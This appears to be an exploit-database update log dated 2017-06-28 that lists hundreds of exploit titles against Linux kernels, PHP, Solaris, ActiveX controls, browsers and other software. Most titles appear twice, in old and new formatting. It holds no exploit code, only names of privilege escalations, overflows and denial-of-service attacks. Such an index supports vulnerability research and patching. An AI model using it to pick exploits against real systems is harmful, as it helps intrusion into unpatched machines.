DB: 2017-06-28
4 new exploits OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs OpenSSL ASN.1 < 0.9.6j/0.9.7b - Brute Forcer for Parsing Bugs Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink Exploit RedHat 6.1 / 6.2 - TTY Flood Users Exploit RedHat 6.1/6.2 - TTY Flood Users Exploit Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service Linux Kernel 2.4.28 / 2.6.9 - 'scm_send Local' Denial of Service Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local Denial of Service Linux Kernel 2.4.28 / 2.6.9 - 'ip_options_get' Local Overflow Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service Xaraya 1.0.0 RC4 - create() Denial of Service Xaraya 1.0.0 RC4 - 'create()' Denial of Service BitchX 1.1-final - do_hook() Remote Denial of Service BitchX 1.1-final - 'do_hook()' Remote Denial of Service Quake 3 Engine Client - CG_ServerCommand() Remote Overflow Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC) Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC) FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service FreeBSD 5.4/6.0 - (ptrace PT_LWPINFO) Local Denial of Service Asterisk 1.0.12 / 1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC) Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC) PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC) PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC) Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC) Apple Mac OSX 10.4.8 - AppleTalk 'ATPsndrsp()' Heap Buffer Overflow (PoC) Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC) Netrek 2.12.0 - pmessage2() Remote Limited Format String PHP 5 - wddx_deserialize() String Append Crash Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC) Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String PHP 5 - 'wddx_deserialize()' String Append Crash Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC) Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service PHP 4.4.5/4.4.6 - 'session_decode()' Double-Free (PoC) Opera 9.10 - alert() Remote Denial of Service Opera 9.10 - 'alert()' Remote Denial of Service PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service PHP 5.2.3 - glob() Denial of Service Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service PHP 5.2.3 - 'glob()' Denial of Service Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC) HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC) EDraw Office Viewer Component 5.3 - FtpDownloadFile() Remote Buffer Overflow EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow eXtremail 2.1.1 - memmove() Remote Denial of Service eXtremail 2.1.1 - 'memmove()' Remote Denial of Service Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC) Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC) Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC) Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC) OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC) OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC) KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC) KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC) Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC) Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC) Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service fhttpd 0.4.2 un64() - Remote Denial of Service fhttpd 0.4.2 - 'un64()' Remote Denial of Service VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service AyeView 2.20 - Malformed .GIF Image Local Crash AyeView 2.20 - Malformed '.GIF' Image Local Crash Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC) DesignWorks Professional 4.3.1 - '.CCT' File Local Stack Buffer Overflow (PoC) Vinagre < 2.24.2 - show_error() Remote Format String (PoC) Vinagre < 2.24.2 - 'show_error()' Remote Format String (PoC) Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service MW6 Barcode ActiveX - 'Barcode.dll' Remote Heap Overflow (PoC) MW6 Barcode - ActiveX 'Barcode.dll' Remote Heap Overflow (PoC) Multiple Vendors libc:fts_*() - Local Denial of Service Multiple Vendors - 'libc:fts_*()' Local Denial of Service Icewarp Merak Mail Server 9.4.1 - Base64FileEncode() Buffer Overflow (PoC) Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC) OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow (PoC) Notepad++ 5.4.5 - '.C' / '.CPP' Local Stack Buffer Overflow (PoC) Drupal 6.16 / 5.21 - Denial of Service Drupal 5.21/6.16 - Denial of Service SopCast SopCore Control ActiveX - Remote Execution (PoC) UUSee ReliPlayer ActiveX - Remote Execution (PoC) SopCast SopCore Control - ActiveX Remote Execution (PoC) UUSee ReliPlayer - ActiveX Remote Execution (PoC) Aqua Real 1.0 / 2.0 - Local Crash (PoC) Aqua Real 1.0/2.0 - Local Crash (PoC) iPhone - WebCore::CSSSelector() Remote Crash iPhone - 'WebCore::CSSSelector()' Remote Crash avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion Apple Safari 4.0.3/4.0.4 - Stack Exhaustion Multiple browsers - history.go() Denial of Service Multiple browsers - window.print() Denial of Service Multiple browsers - 'history.go()' Denial of Service Multiple browsers - 'window.print()' Denial of Service FreeBSD Kernel - mountnfs() Exploit FreeBSD Kernel - 'mountnfs()' Exploit Microsoft Internet Explorer 6 / 7 - Remote Denial of Service Microsoft Internet Explorer 6/7 - Remote Denial of Service PHP 5.3.3 - ibase_gen_id() Off-by-One Overflow PHP 5.3.3 - 'ibase_gen_id()' Off-by-One Overflow Microsoft DRM Technology 'msnetobj.dll' ActiveX - Multiple Vulnerabilities RarCrack 0.2 - 'Filename' init() .bss (PoC) Microsoft DRM Technology - 'msnetobj.dll' ActiveX Multiple Vulnerabilities RarCrack 0.2 - 'Filename' 'init()' '.bss' (PoC) Mozilla Firefox 3.5.10 / 3.6.6 - WMP Memory Corruption Using Popups Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups Microsoft Windows Mobile 6.1 / 6.5 - Double-Free Denial of Service Microsoft Windows Mobile 6.1/6.5 - Double-Free Denial of Service LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service LeadTools 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption PHP 5.3.5 - grapheme_extract() Null Pointer Dereference PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution Novell ZenWorks 10/11 - TFTPD Remote Code Execution PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service PHP 5.3.10 - spl_autoload_register() Local Denial of Service PHP 5.3.10 - spl_autoload_call() Local Denial of Service PHP 5.3.10 - 'spl_autoload_register()' Local Denial of Service PHP 5.3.10 - 'spl_autoload_call()' Local Denial of Service PHP 5.3.10 - spl_autoload() Local Denial of Service PHP 5.3.10 - 'spl_autoload()' Local Denial of Service Apple iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC) Apple iOS 5.1.1 Safari Browser - 'JS match()' / 'search()' Crash (PoC) Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.0 / 2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options Linux Kernel 2.0/2.1/2.2 - autofs Exploit HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service Linux Kernel 2.0 / 2.0.33 - i_count Overflow (PoC) Linux Kernel 2.0/2.0.33 - i_count Overflow (PoC) FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - setsockopt() Denial of Service FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service Linux Kernel 2.2.12 / 2.2.14 / 2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC) PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC) Linux Kernel 2.1.89 / 2.2.x - Zero-Length Fragment Linux Kernel 2.1.89/2.2.x - Zero-Length Fragment Wireshark 1.8.2 / 1.6.0 - Buffer Overflow (PoC) Wireshark 1.6.0/1.8.2 - Buffer Overflow (PoC) MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 / 5.2.1 - File Scanner Malicious Archive Denial of Service MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service Linux Kernel 2.4.18 / 2.4.19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1) Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1) PHP 4.3 - socket_iovec_alloc() Integer Overflow PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow PHP 4.x - socket_recv() Signed Integer Memory Corruption PHP 4.x - socket_recvfrom() Signed Integer Memory Corruption PHP 4.x - 'socket_recv()' Signed Integer Memory Corruption PHP 4.x - 'socket_recvfrom()' Signed Integer Memory Corruption Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service Colloquy 1.3.5 / 1.3.6 - Denial of Service Colloquy 1.3.5/1.3.6 - Denial of Service FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service FreeBSD 4.10/5.x - 'execve()' Unaligned Memory Access Denial of Service PHP 3/4/5 - Multiple Local / Remote Vulnerabilities (1) PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (1) Linux Kernel 2.4.x / 2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2) PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (2) Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow Linux Kernel 2.6.32-642 /3.16.0-4 - 'inode' Integer Overflow Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC) Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC) Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service Firebird 1.5 - Local Inet_Server Buffer Overflow Firebird 1.5 - Inet_Server Local Buffer Overflow Apple Mac OSX 10.x - '.zip' Parsing BOMStackPop() Function Overflow Apple Mac OSX 10.x - '.zip' Parsing 'BOMStackPop()' Function Overflow FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption PulseAudio 0.9.5 - Assert() Remote Denial of Service PulseAudio 0.9.5 - 'Assert()' Remote Denial of Service VBScript 5.8.7600.16385 / 5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read PHP openssl_x509_parse() - Memory Corruption PHP - 'openssl_x509_parse()' Memory Corruption MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow MW6 Technologies Aztec - ActiveX 'Data Pparameter Buffer Overflow MW6 Technologies Datamatrix - ActiveX 'Data' Parameter Buffer Overflow MW6 Technologies MaxiCode - ActiveX 'Data' Parameter Buffer Overflow MySQL 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling Denial of Service MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service phpMyAdmin 4.0.x / 4.1.x / 4.2.x - Denial of Service phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service UltraPlayer 2.112 Malformed - '.avi' File Denial of Service UltraPlayer 2.112 - Malformed '.avi' File Denial of Service Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free PHP GMP unserialize() - Use-After-Free PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities PHP 5.4/5.5/5.6 - SplDoublyLinkedList 'Unserialize()' Use-After-Free PHP GMP - 'unserialize()' Use-After-Free PHP 5.4/5.5/5.6 - SplObjectStorage 'Unserialize()' Use-After-Free PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities Python 2.7 strop.replace() Method - Integer Overflow Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read Python 2.7 - 'strop.replace()' Method Integer Overflow Python 3.3 < 3.5 - 'product_setstate()' Function Out-of-Bounds Read Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow Linux Kernel 3.10 / 3.18 / 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick) ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick) Linux ARM/ARM64 - perf_event_open() Arbitrary Memory Read Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4- PacketBB Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - WSP Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - RLC Dissector Denial of Service PHP 5.0.0 - hw_docbyanchor() Local Denial of Service PHP 5.0.0 - 'hw_docbyanchor()' Local Denial of Service Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference Linux Kernel 3.10.0-327/4.8.0-22 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation man-db 2.4.1 - open_cat_stream() Local uid=man Exploit man-db 2.4.1 - 'open_cat_stream()' Local uid=man Exploit Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Privilege Escalation xsplumber - strcpy() Buffer Overflow xsplumber - 'strcpy()' Buffer Overflow BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit BSDi 3.0/4.0 - rcvtty[mh] Local Exploit Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow Solaris 7 / 8-beta - arp Local Overflow Solaris 7/8-beta - ARP Local Overflow Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow LibXt - XtAppInitialize() Overflow *xterm Exploit LibXt - 'XtAppInitialize()' Overflow *xterm Exploit SGI IRIX - '/bin/login Local' Buffer Overflow SGI IRIX - '/bin/login' Local Buffer Overflow LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow CDRecord's ReadCD - '$RSH' exec() SUID Shell Creation CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation Linux Kernel 2.4.27 / 2.6.8 - 'binfmt_elf' Executable File Read Exploit Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read Exploit Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation Setuid perl - PerlIO_Debug() Overflow Setuid perl - 'PerlIO_Debug()' Overflow Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3) Linux Kernel 2.4.x/2.6.x - 'uselib()' Privilege Escalation (3) Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2) Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2) ePSXe 1.6.0 - nogui() Local Exploit ePSXe 1.6.0 - 'nogui()' Local Exploit Solaris 9 / 10 - ld.so Privilege Escalation (1) Solaris 9 / 10 - ld.so Privilege Escalation (2) Solaris 9/10 - 'ld.so' Privilege Escalation (1) Solaris 9/10 - 'ld.so' Privilege Escalation (2) Python 2.4.2 - realpath() Local Stack Overflow Python 2.4.2 - 'realpath()' Local Stack Overflow Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1) Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1) Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflow PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow (PoC) PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC) PHP 4.4.3/5.1.4 - 'sscanf' Local Buffer Overflow Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit Solaris 8/9 - '/usr/ucb/ps' Local Information Leak Exploit OpenBSD 3.x < 4.0 - vga_ioctl() Privilege Escalation OpenBSD 3.x < 4.0 - 'vga_ioctl()' Privilege Escalation PHP < 4.4.5 / 5.2.1 - PHP_binary Session Deserialization Information Leak PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow PHP 5.2.1 - substr_compare() Information Leak Exploit PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak PHP 4.4.6 - 'mssql_[p]connect()' Local Buffer Overflow PHP 5.2.1 - 'substr_compare()' Information Leak Exploit PHP < 4.4.5/5.2.1 - 'shmop' Functions Local Code Execution PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC) PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC) PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC) PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC) PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC) PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC) PHP 5.2.1 - session_regenerate_id() Double-Free Exploit PHP 5.2.1 - 'session_regenerate_id()' Double-Free Exploit PHP 4.4.6 - ibase_connect() Local Buffer Overflow PHP 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit PHP 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit PHP 5.2.1 - hash_update_file() Freed Resource Usage Exploit PHP 5.2.1 - Unserialize() Local Information Leak Exploit PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Exploit PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow Exploit PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage Exploit PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage Exploit PHP 5.2.1 - 'Unserialize()' Local Information Leak Exploit PHP < 4.4.5/5.2.1 - '_SESSION' 'unset()' Local Exploit PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite PHP 5.2.3 - snmpget() object id Local Buffer Overflow PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation IBM AIX 5.3 SP6 - FTP 'gets()' Privilege Escalation PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI) PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI) PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow Adobe Reader - util.printf() JavaScript Function Stack Overflow (1) Adobe Reader - util.printf() JavaScript Function Stack Overflow (2) Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1) Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2) 